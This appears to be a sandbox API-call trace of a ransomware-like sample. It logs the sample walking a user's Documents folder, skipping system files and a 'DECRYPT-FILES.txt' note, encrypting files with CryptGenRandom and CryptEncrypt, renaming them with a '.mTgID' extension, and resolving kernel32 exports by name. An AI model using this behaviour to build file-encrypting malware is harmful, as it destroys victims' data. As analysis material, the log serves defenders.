lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.148] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.148] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.148] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.148] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.148] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.148] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.149] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.149] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx") returned 49 [0084.149] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx.mTgID") returned 55 [0084.149] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ikm6.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx.mTgID" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ikm6.docx.mtgid"), dwFlags=0x0) returned 1 [0084.149] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.150] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.150] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.150] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae10b880, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae10b880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae10b880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.150] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.150] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.150] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.150] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.151] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.151] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.151] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.151] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.151] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.151] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkbimi8.tmp" [0084.151] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.151] CloseHandle (hObject=0x0) returned 0 [0084.151] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.151] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a182c0, ftCreationTime.dwHighDateTime=0x1d57775, ftLastAccessTime.dwLowDateTime=0xd82ae5e0, ftLastAccessTime.dwHighDateTime=0x1d5569a, ftLastWriteTime.dwLowDateTime=0xd82ae5e0, ftLastWriteTime.dwHighDateTime=0x1d5569a, nFileSizeHigh=0x0, nFileSizeLow=0x1a71, dwReserved0=0x0, dwReserved1=0x0, cFileName="mf7HbrwzhAs09W.pptx", cAlternateFileName="MF7HBR~1.PPT")) returned 1 [0084.151] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.151] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="autorun.inf") returned 1 [0084.151] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="boot.ini") returned 1 [0084.151] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="desktop.ini") returned 1 [0084.151] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="ntuser.dat") returned -1 [0084.151] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="iconcache.db") returned 1 [0084.151] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="bootsect.bak") returned 1 [0084.151] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="ntuser.dat.log") returned -1 [0084.152] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="thumbs.db") returned -1 [0084.152] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx", lpString2="Bootfont.bin") returned 1 [0084.152] lstrlenW (lpString="mf7HbrwzhAs09W.pptx") returned 19 [0084.152] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0084.152] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0084.152] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0084.152] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0084.152] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.152] lstrlenW (lpString="mf7HbrwzhAs09W.pptx") returned 19 [0084.152] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.152] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="mf7HbrwzhAs09W.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx" [0084.152] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.152] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mf7hbrwzhas09w.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.152] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=6769) returned 1 [0084.152] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.152] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.152] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.153] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.153] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.153] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.153] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.153] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.154] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.154] CloseHandle (hObject=0x414) returned 1 [0084.154] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.154] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.155] CloseHandle (hObject=0x0) returned 0 [0084.155] CloseHandle (hObject=0x410) returned 1 [0084.155] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.155] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.155] GetTickCount () returned 0x114d808 [0084.155] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.156] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.156] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.156] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.156] lstrlenA (lpString="kernel32.dll") returned 12 [0084.156] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.156] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.156] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.156] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.156] lstrlenA (lpString="ADDATOMA") returned 8 [0084.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.157] lstrlenA (lpString="ADDATOMW") returned 8 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.157] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.157] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.157] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.157] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.157] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.157] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.157] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.157] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.157] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.157] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.157] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.157] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.157] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.157] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.157] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.157] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.157] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.157] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.158] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.158] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.158] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.158] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.158] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.158] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.158] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.158] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.158] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.158] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.158] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.158] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.158] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.158] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.158] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.158] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.158] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.158] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.159] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.159] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.159] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.159] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.159] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.159] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.159] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.159] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.159] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.159] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.159] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.159] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.159] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.159] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.159] lstrlenA (lpString="BEEP") returned 4 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.159] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.159] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.159] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.159] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.160] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.160] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.160] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.160] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.160] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.160] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.160] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.160] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.160] lstrlenA (lpString="CANCELIO") returned 8 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, 